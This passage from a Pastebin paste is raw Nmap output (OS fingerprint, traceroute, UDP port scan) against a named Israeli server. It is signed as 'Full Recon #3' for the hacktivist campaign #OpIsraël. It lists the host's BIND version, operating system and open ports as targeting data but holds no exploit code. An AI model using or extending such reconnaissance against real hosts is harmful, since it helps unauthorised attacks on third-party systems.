  3880. | AQEAr/uRtz74Kc4qIEnSgfQQgY+r3EyOCRPcIoTGbcukLIwe9sP2PdMIYeonuEh4
  3881. | bshnBLjjtk6CzcOK9s1Vb1CW4Vmtb5eI1TNcsokAUVV5llTZEfIuY2UtroV8W2LI
  3882. | WZ6VxbwEzd+UeeGrHiMUc9O94sxU/fDo5ttAdElgfIEp+uR5qDG2VzpE5F7Lc61L
  3883. | CF7xFUrxRMgCYYCYmr7Zs/FNY2nU920i7hRco6bgRQeQvAC+KFKsHuUzyq08g3Q6
  3884. | 0V6DCBmAaq5Ku4QzQBGSFRXb/6jYYhGYxO4f6VsxLrBA7LL0kwUL+YCjXCz1iK3R
  3885. | 6kiVRcyJqtWahOHDq3YKaLtr1wIDAQABMA0GCSqGSIb3DQEBBQUAA4IBAQA+4fjC
  3886. | b19T78ZHZNXZodf7Tpl8PMY6ljd6nU9dokYwvnFgR9anGpTfXipcGDSorEdFMBqH
  3887. | 5cPN/yu6SNRQaLnYwqII9we2HDMFAnYlvCb1vNSSp2k+KIf6nEEvE2B0zfL7+dHJ
  3888. | 0rJyggNXT0VTs7ZI9PM/RlPH75khNHD7U3Vz4NSBVm7oTVg8VZhExKhS2JTy2zii
  3889. | WjGPVzBbMzGioZhHE/b96M70o+89fxkE+g3oNJLAZJfao2qy5oiLAt1spCPQ40HW
  3890. | hPzHGuGIMABG+263nikmVG0m0A3JTYQLfgBqxiBkauP6kT3KszTGXWUduj/9YHRW
  3891. | Mkh66D1gfgB2ubts
  3892. |_-----END CERTIFICATE-----
  3893. |_ssl-date: TLS randomness does not represent time
  3894. | tls-alpn:
  3895. |_ http/1.1
  3896. OS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU
  3897. Aggressive OS guesses: Linux 2.6.32 (93%), Linux 3.4 (93%), Synology DiskStation Manager 5.1 (92%), Linux 3.10 (92%), Linux 2.6.32 or 3.10 (92%), Linux 2.6.39 (92%), WatchGuard Fireware 11.8 (92%), Linux 3.1 - 3.2 (92%), Linux 2.6.32 - 2.6.39 (90%), Linux 3.2 - 3.8 (88%)
  3898. No exact OS matches for host (test conditions non-ideal).
  3899. TCP/IP fingerprint:
  3900. SCAN(V=7.70SVN%E=4%D=1/23%OT=21%CT=1%CU=%PV=N%DS=17%DC=T%G=N%TM=5C483C37%P=x86_64-unknown-linux-gnu)
  3901. SEQ(SP=10A%GCD=1%ISR=10C%TI=Z%II=I%TS=A)
  3902. SEQ(SP=10A%GCD=1%ISR=10C%TI=Z%TS=A)
  3903. OPS(O1=M4B3ST11NW7%O2=M4B3ST11NW7%O3=M4B3NNT11NW7%O4=M4B3ST11NW7%O5=M4B3ST11NW7%O6=M4B3ST11)
  3904. WIN(W1=3890%W2=3890%W3=3890%W4=3890%W5=3890%W6=3890)
  3905. ECN(R=Y%DF=Y%TG=40%W=3908%O=M4B3NNSNW7%CC=Y%Q=)
  3906. T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
  3907. T2(R=N)
  3908. T3(R=N)
  3909. T4(R=N)
  3910. T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
  3911. T6(R=N)
  3912. T7(R=N)
  3913. U1(R=N)
  3914. IE(R=Y%DFI=N%TG=40%CD=S)
  3915.  
  3916. Uptime guess: 25.499 days (since Fri Dec 28 17:06:06 2018)
  3917. Network Distance: 17 hops
  3918. TCP Sequence Prediction: Difficulty=266 (Good luck!)
  3919. IP ID Sequence Generation: All zeros
  3920. Service Info: OSs: Unix, Linux; CPE: cpe:/o:redhat:enterprise_linux:7
  3921.  
  3922. TRACEROUTE (using proto 1/icmp)
  3923. HOP RTT ADDRESS
  3924. 1 143.99 ms 10.246.200.1
  3925. 2 144.80 ms vlan113.as01.sof1.bg.m247.com (193.9.115.113)
  3926. 3 144.04 ms vlan299.bb1.sof1.bg.m247.com (176.10.83.34)
  3927. 4 144.07 ms sfia-b2-link.telia.net (62.115.148.144)
  3928. 5 178.25 ms 62.115.119.76
  3929. 6 177.09 ms 62.115.133.79
  3930. 7 184.94 ms ffm-b1-link.telia.net (62.115.116.158)
  3931. 8 177.14 ms netvision-ic-309800-ffm-b11.c.telia.net (80.239.196.190)
  3932. 9 ...
  3933. 10 230.24 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
  3934. 11 230.92 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
  3935. 12 231.85 ms 212.143.7.247
  3936. 13 231.86 ms core2-rha-2-0-0-core2-hfa-5-0-7.nv.net.il (212.143.12.119)
  3937. 14 233.87 ms po231.srvc3.rha.nv.net.il (212.143.201.190)
  3938. 15 236.39 ms 82.166.37.254
  3939. 16 237.16 ms 62-90-134-178.barak.net.il (62.90.134.178)
  3940. 17 236.33 ms server.webid.co.il (62.90.134.182)
  3941.  
  3942. NSE: Script Post-scanning.
  3943. NSE: Starting runlevel 1 (of 3) scan.
  3944. Initiating NSE at 05:04
  3945. Completed NSE at 05:04, 0.00s elapsed
  3946. NSE: Starting runlevel 2 (of 3) scan.
  3947. Initiating NSE at 05:04
  3948. Completed NSE at 05:04, 0.00s elapsed
  3949. NSE: Starting runlevel 3 (of 3) scan.
  3950. Initiating NSE at 05:04
  3951. Completed NSE at 05:04, 0.00s elapsed
  3952. Read data files from: /usr/local/bin/../share/nmap
  3953. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  3954. Nmap done: 1 IP address (1 host up) scanned in 302.87 seconds
  3955. Raw packets sent: 101 (7.894KB) | Rcvd: 1371 (577.453KB)
  3956. ######################################################################################################################################
  3957. Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 05:04 EST
  3958. NSE: Loaded 149 scripts for scanning.
  3959. NSE: Script Pre-scanning.
  3960. Initiating NSE at 05:04
  3961. Completed NSE at 05:04, 0.00s elapsed
  3962. Initiating NSE at 05:04
  3963. Completed NSE at 05:04, 0.00s elapsed
  3964. Initiating NSE at 05:04
  3965. Completed NSE at 05:04, 0.00s elapsed
  3966. Initiating Parallel DNS resolution of 1 host. at 05:04
  3967. Completed Parallel DNS resolution of 1 host. at 05:04, 0.02s elapsed
  3968. Initiating UDP Scan at 05:04
  3969. Scanning server.webid.co.il (62.90.134.182) [13 ports]
  3970. Discovered open port 53/udp on 62.90.134.182
  3971. Completed UDP Scan at 05:04, 5.77s elapsed (13 total ports)
  3972. Initiating Service scan at 05:04
  3973. Scanning 1 service on server.webid.co.il (62.90.134.182)
  3974. Completed Service scan at 05:04, 0.34s elapsed (1 service on 1 host)
  3975. Initiating OS detection (try #1) against server.webid.co.il (62.90.134.182)
  3976. Retrying OS detection (try #2) against server.webid.co.il (62.90.134.182)
  3977. Initiating Traceroute at 05:04
  3978. Completed Traceroute at 05:04, 7.20s elapsed
  3979. Initiating Parallel DNS resolution of 1 host. at 05:04
  3980. Completed Parallel DNS resolution of 1 host. at 05:04, 0.02s elapsed
  3981. NSE: Script scanning 62.90.134.182.
  3982. Initiating NSE at 05:04
  3983. Completed NSE at 05:04, 0.69s elapsed
  3984. Initiating NSE at 05:04
  3985. Completed NSE at 05:04, 0.00s elapsed
  3986. Initiating NSE at 05:04
  3987. Completed NSE at 05:04, 0.00s elapsed
  3988. Nmap scan report for server.webid.co.il (62.90.134.182)
  3989. Host is up (0.32s latency).
  3990.  
  3991. PORT STATE SERVICE VERSION
  3992. 53/udp open domain ISC BIND 9.9.4 (RedHat Enterprise Linux 7)
  3993. | dns-nsid:
  3994. |_ bind.version: 9.9.4-RedHat-9.9.4-61.el7
  3995. 67/udp closed dhcps
  3996. 68/udp closed dhcpc
  3997. 69/udp closed tftp
  3998. 88/udp closed kerberos-sec
  3999. 123/udp closed ntp
  4000. 137/udp filtered netbios-ns
  4001. 138/udp filtered netbios-dgm
  4002. 139/udp closed netbios-ssn
  4003. 162/udp closed snmptrap
  4004. 389/udp closed ldap
  4005. 520/udp closed route
  4006. 2049/udp closed nfs
  4007. Too many fingerprints match this host to give specific OS details
  4008. Network Distance: 16 hops
  4009. Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:7
  4010.  
  4011. TRACEROUTE (using port 137/udp)
  4012. HOP RTT ADDRESS
  4013. 1 ... 6
  4014. 7 144.45 ms 10.246.200.1
  4015. 8 ... 9
  4016. 10 142.52 ms 10.246.200.1
  4017. 11 146.42 ms 10.246.200.1
  4018. 12 146.40 ms 10.246.200.1
  4019. 13 146.39 ms 10.246.200.1
  4020. 14 146.39 ms 10.246.200.1
  4021. 15 146.38 ms 10.246.200.1
  4022. 16 146.39 ms 10.246.200.1
  4023. 17 ... 18
  4024. 19 144.29 ms 10.246.200.1
  4025. 20 144.57 ms 10.246.200.1
  4026. 21 144.71 ms 10.246.200.1
  4027. 22 ... 29
  4028. 30 142.65 ms 10.246.200.1
  4029.  
  4030. NSE: Script Post-scanning.
  4031. Initiating NSE at 05:04
  4032. Completed NSE at 05:04, 0.00s elapsed
  4033. Initiating NSE at 05:04
  4034. Completed NSE at 05:04, 0.00s elapsed
  4035. Initiating NSE at 05:04
  4036. Completed NSE at 05:04, 0.00s elapsed
  4037. Read data files from: /usr/local/bin/../share/nmap
  4038. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  4039. Nmap done: 1 IP address (1 host up) scanned in 19.93 seconds
  4040. Raw packets sent: 124 (9.536KB) | Rcvd: 2124 (547.988KB)
  4041. #######################################################################################################################################
  4042. Anonymous JTSEC #OpIsraël Full Recon #3
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!